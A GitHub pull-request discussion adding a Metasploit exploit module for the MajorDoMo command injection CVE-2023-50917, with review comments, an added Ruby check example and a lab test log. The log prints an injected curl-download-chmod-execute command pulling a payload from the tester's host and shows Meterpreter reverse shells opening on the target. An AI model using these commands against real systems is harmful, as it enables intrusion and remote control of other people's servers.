
Add CVE-2023-50917: MajorDoMo Command Injection Module #18630

Merged

Conversation

@Chocapikk Chocapikk commented Dec 19, 2023

Summary:

I have implemented an exploit module for a command injection vulnerability in MajorDoMo, identified as CVE-2023-50917. The vulnerability affects versions prior to 0662e5e. This module also supports scenarios where the target is protected by HTTP Basic Authentication.

Changes:

  • New Exploit Module: Added modules/exploits/linux/http/majordomo_cmd_inject_cve_2023_50917.rb.
  • MajorDoMo Instance Check: Implemented majordomo? method for confirming the target's identity based on the MD5 hash of favicon.ico.
  • HTTP Basic Authentication Handling: Added send_request_with_auth to manage HTTP Basic Authentication.
  • Updated Check Method: Enhanced check method to validate the presence of Detector.js and ascertain MajorDoMo instance status.
  • Module Options: Included options for username and password to handle HTTP Basic Authentication.

Sources and References:

Motivation:

  • My first CVE

@Chocapikk Chocapikk (author) commented:

NOTE:

I have just fixed a statement. In fact, I based it on the detection of the Detector.js file, which was deleted just after the first patch on the project: sergejey/majordomo@706e5df. If you use the installation method I've recommended, replacing the thumb.php file on the latest patched version, it'll say it's not vulnerable. I've done this installation method on the fly; it's much simpler that way than setting up MajorDoMo from source. If you use a source lower than commit 0662e5e, there won't be any problems. I'm just saying that so you don't get confused.

@smcintyre-r7 smcintyre-r7 left a comment

Congratulations on your first CVE and thanks for submitting a Metasploit module to us!

I was able to get the software installing and confirm that the module is working. I made some recommendations that should simplify things. Some of the changes are related to the #check method to ensure that the codes it returns are aligned with our descriptions.

Comment on lines 69 to 84
def majordomo?
favicon_uri = normalize_uri(datastore['TARGETURI'], 'favicon.ico')
res = send_request_with_auth(favicon_uri)

if res.nil? || res.code != 200
print_error('Cannot verify if target is MajorDoMo')
false
elsif Rex::Text.md5(res.body) == '08d30f79c76f124754ac6f7789ca3ab1'
print_good('Target is identified as MajorDoMo instance')
true
else
print_error('Target might not be MajorDoMo')
false
end
end


This is only used in #check, but the problem is that it doesn't differentiate between instances where the server doesn't respond (and CheckCode::Unknown should be returned) and those where the target is not MajorDoMo. In my suggestion for the #check method changes, I broke this out to be more specific.

Suggested change: delete lines 69 to 84 (the majordomo? method shown above).

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager

You've included this but you're not actually using it. You should either remove it or use it.

Suggested change: delete the line include Msf::Exploit::CmdStager.
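The check-code split the reviewer asks for above (Unknown when the server never answers or rejects the credentials, Safe when it answers but is not MajorDoMo, Vulnerable only after the sleep-based injection test succeeds), together with the favicon MD5 fingerprint and the HTTP Basic handling listed in the PR description, written out as an added stand-alone Ruby example. This is not code from the module or from the PR: the /inject path and its "sleep N" body are hypothetical stand-ins for the module's real thumb.php request, which this page does not reproduce; FakeTarget is a constructed offline target; expected_md5 is a parameter only so the fake can be matched, with the real MajorDoMo hash as the default.

```ruby
require 'digest'

# MD5 of MajorDoMo's favicon.ico, the fingerprint the PR's majordomo? method compares against.
MAJORDOMO_FAVICON_MD5 = '08d30f79c76f124754ac6f7789ca3ab1'

# Minimal HTTP response shape. A transport returns one of these, or nil when the
# server never answers (connection refused, timeout).
Response = Struct.new(:code, :body)

# Headers for every request; an HTTP Basic Authorization header is added only when a
# username is given (the PR's send_request_with_auth does this inside Metasploit's HttpClient).
# [str].pack('m0') is strict base64 with no trailing newline.
def request_headers(username = nil, password = nil)
  headers = { 'User-Agent' => 'majordomo-check' }
  unless username.to_s.empty?
    headers['Authorization'] = 'Basic ' + ["#{username}:#{password}"].pack('m0')
  end
  headers
end

# Fingerprint step. Returns a CheckCode-like symbol:
#   :unknown  - no response, or credentials rejected, so nothing can be said either way
#   :safe     - the server answered but favicon.ico is not MajorDoMo's
#   :detected - favicon hash matches, MajorDoMo is running (vulnerability not yet confirmed)
def fingerprint(transport, headers, expected_md5 = MAJORDOMO_FAVICON_MD5)
  res = transport.call('GET', '/favicon.ico', headers, nil)
  return :unknown if res.nil?
  return :unknown if [401, 403].include?(res.code)
  return :safe unless res.code == 200
  Digest::MD5.hexdigest(res.body) == expected_md5 ? :detected : :safe
end

# Time-based confirmation: inject a sleep and require the round trip to take (almost)
# that long. /inject and the body format are hypothetical; the 0.9 factor absorbs
# timer jitter so a genuine sleep is never rejected by a few milliseconds.
def injection_confirmed?(transport, headers, seconds)
  started = Process.clock_gettime(Process::CLOCK_MONOTONIC)
  transport.call('POST', '/inject', headers, "sleep #{seconds}")
  elapsed = Process.clock_gettime(Process::CLOCK_MONOTONIC) - started
  elapsed >= seconds * 0.9
end

# Full check: fingerprint first, so an unreachable or foreign host is never reported
# as :safe or :vulnerable on the strength of a timing measurement alone.
def check(transport, username: nil, password: nil, sleep_seconds: 6,
          expected_md5: MAJORDOMO_FAVICON_MD5)
  headers = request_headers(username, password)
  code = fingerprint(transport, headers, expected_md5)
  return code unless code == :detected
  injection_confirmed?(transport, headers, sleep_seconds) ? :vulnerable : :detected
end

# Constructed stand-in for a target so the check runs offline; not a real MajorDoMo.
class FakeTarget
  FAVICON = 'constructed favicon bytes'.freeze
  FAVICON_MD5 = Digest::MD5.hexdigest(FAVICON)

  def initialize(reachable: true, auth: nil, majordomo: true, vulnerable: true)
    @reachable, @auth, @majordomo, @vulnerable = reachable, auth, majordomo, vulnerable
  end

  def call(_method, path, headers, body)
    return nil unless @reachable                       # simulates no response at all
    if @auth
      expected = 'Basic ' + [@auth].pack('m0')
      return Response.new(401, '') unless headers['Authorization'] == expected
    end
    case path
    when '/favicon.ico'
      Response.new(200, @majordomo ? FAVICON : 'some other site')
    when '/inject'
      if @vulnerable && (m = body.to_s.match(/\Asleep (\S+)\z/))
        sleep(m[1].to_f)                               # the "injected" command runs
      end
      Response.new(200, '')
    else
      Response.new(404, '')
    end
  end
end

if $PROGRAM_NAME == __FILE__
  target = FakeTarget.new(auth: 'admin:secret')
  puts check(target, username: 'admin', password: 'secret',
             sleep_seconds: 0.3, expected_md5: FakeTarget::FAVICON_MD5)
end
```

Against a live target the real module issues a six- or ten-second sleep (see the testing output further down); the short sleeps here only keep the offline run fast. Returning :unknown for a 401 rather than :safe matters in practice: a Basic-auth-protected instance with wrong credentials is not evidence that the host is unaffected.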

@Chocapikk Chocapikk commented Jan 10, 2024

Hello @smcintyre-r7, I've updated the code and requested a review 3 weeks ago; any updates?

Thanks a lot

@smcintyre-r7 smcintyre-r7 left a comment

Hey sorry about the delay on this. I just ran through it once more and everything is looking good to me so I'll go ahead and get it landed.

Testing Output
./msfconsole
Calling `DidYouMean::SPELL_CHECKERS.merge!(error_name => spell_checker)' has been deprecated. Please call `DidYouMean.correct_error(error_name, spell_checker)' instead.
Metasploit tip: Metasploit can be configured at startup, see msfconsole 
--help to learn more
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
                                                  
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::##############                              :::::::::::::::::::
############################  ##############################  :::::::::::::::::
#########################  ######???????????????????????######  :::::::::::::::
=========================  ####??????????()????()?????????####  :::::::::::::::
=========================  ##????()??????????????    ()?????##  ::::    :::::::
------------=============  ##??????????????????  ;;;;  ?????##  ::  ;;;;  :::::
-------------------------  ##??????????()??????  ;;;;;;?????##    ;;;;;;  :::::
-------------------------  ##??????????????????  ;;;;;;         ;;;;;;;;  :::::
++++++++++++-------------  ##??????????????????  ;;;;;;;;;;;;;;;;;;;;;;;  :::::
+++++++++++++++++++++++++  ##????????????()??  ;;;;;;;;;;;;;;;;;;;;;;;;;;;  :::
+++++++++++++++++++++++++  ##??()????????????  ;;;;;;@@  ;;;;;;;;@@  ;;;;;  :::
%%%%%%%%%%%%%++++    ;;;;  ##????????????????  ;;;;;;    ;;;  ;;;    ;;;;;  :::
%%%%%%%%%%%%%%%%%;;;;;;;;  ####??????()??????  ;;[];;;;;;;;;;;;;;;;;;;;;[]  :::
$$$$$$$$$$$$$%%  ;; %%%%%  ######?????????????  ;;;;;;              ;;;;  :::::
$$$$$$$$$$$$$$$$$  $$$$$$    ###################  ;;;;;;;;;;;;;;;;;;;;  :::::::
$$$$$$$$$$$$$$$$$$$$$$$  ;;;;                                       :::::::::::
:::::::::::::$$$$$$$$$$  ;;;;  ::  ;;  ::::::::::::  ;;  ::  ;;;;  ::::::::::::
:::::::::::::::::::::::      ::::::    :::::::::::::     ::::      ::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
::::::::::::::::NN::::NN::YY::::YY:::AAAAAA:::NN::::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NNNN::NN::YY::::YY::AA::::AA::NNNN::NN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN::::YYYY::::AAAAAAAA::NN::NNNN:::!!::::::::::::::::::::
::::::::::::::::NN::NNNN:::::YY:::::AA::::AA::NN::NNNN:::::::::::::::::::::::::
::::::::::::::::NN::::NN:::::YY:::::AA::::AA::NN::::NN:::!!::::::::::::::::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::::::YOU HAVE DONE THE NYAN FOR 31337 SECONDS!:::::::::::::::::::::


       =[ metasploit v6.3.48-dev-0a2dea523f         
+ -- --=[ 2394 exploits - 1249 auxiliary - 432 post       ]
+ -- --=[ 1391 payloads - 46 encoders - 11 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[*] Processing /home/smcintyre/.msf4/msfconsole.rc for ERB directives.
resource (/home/smcintyre/.msf4/msfconsole.rc)> load request
[*] Successfully loaded plugin: Request
resource (/home/smcintyre/.msf4/msfconsole.rc)> load versions
[*] Successfully loaded plugin: Versions
resource (/home/smcintyre/.msf4/msfconsole.rc)> loadpath test/modules
Loaded 39 modules:
    14 auxiliary modules
    13 exploit modules
    12 post modules
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > show options 

Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to MajorDoMo
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      HgKMiOgkP        no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8888             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR                   yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT               5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > run

[*] Command to run on remote host: curl -so ./lXqFewedpLBY http://192.168.159.128:8888/dau8JtEFWcUux21CRy4HUQ; chmod +x ./lXqFewedpLBY; ./lXqFewedpLBY &
[*] Fetch Handler listening on 192.168.159.128:8888
[*] HTTP server started
[*] Adding resource /dau8JtEFWcUux21CRy4HUQ
[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.159.11:80 can be exploited!
[+] Target is identified as MajorDoMo instance
[*] Performing command injection test issuing a sleep command of 6 seconds.
[*] Elapsed time: 6.113898670999333 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Client 192.168.159.11 requested /dau8JtEFWcUux21CRy4HUQ
[*] Sending payload to 192.168.159.11 (curl/7.81.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.159.11
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.11:49598) at 2024-01-19 17:05:14 -0500

meterpreter > 
meterpreter > getuid
Server username: www-data
meterpreter > sysinfo
Computer     : 192.168.159.11
OS           : Ubuntu 22.04 (Linux 5.15.0-88-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > exit
[*] Shutting down session: 1

[*] 192.168.159.11 - Meterpreter session 1 closed.  Reason: Died
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > set PAYLOAD cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > show options 

Module options (exploit/linux/http/majordomo_cmd_inject_cve_2023_50917):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.11   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI path to MajorDoMo
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT  5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > run

[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking if 192.168.159.11:80 can be exploited!
[+] Target is identified as MajorDoMo instance
[*] Performing command injection test issuing a sleep command of 10 seconds.
[*] Elapsed time: 10.097079567000037 seconds.
[+] The target is vulnerable. Successfully tested command injection.
[*] Sending stage (24772 bytes) to 192.168.159.11
[*] Meterpreter session 2 opened (192.168.159.128:5555 -> 192.168.159.11:44372) at 2024-01-19 17:06:46 -0500

meterpreter > exit
[*] Shutting down session: 2

[*] 192.168.159.11 - Meterpreter session 2 closed.  Reason: Died
msf6 exploit(linux/http/majordomo_cmd_inject_cve_2023_50917) > exit

@smcintyre-r7 smcintyre-r7 merged commit 06dcc82 into rapid7:master Jan 19, 2024
34 checks passed
@smcintyre-r7 smcintyre-r7 commented:

Release Notes

This adds an exploit for a command injection vulnerability in MajorDoMo versions before 0662e5e.

@adfoster-r7 adfoster-r7 added the rn-modules release notes for new or majorly enhanced modules label Jan 26, 2024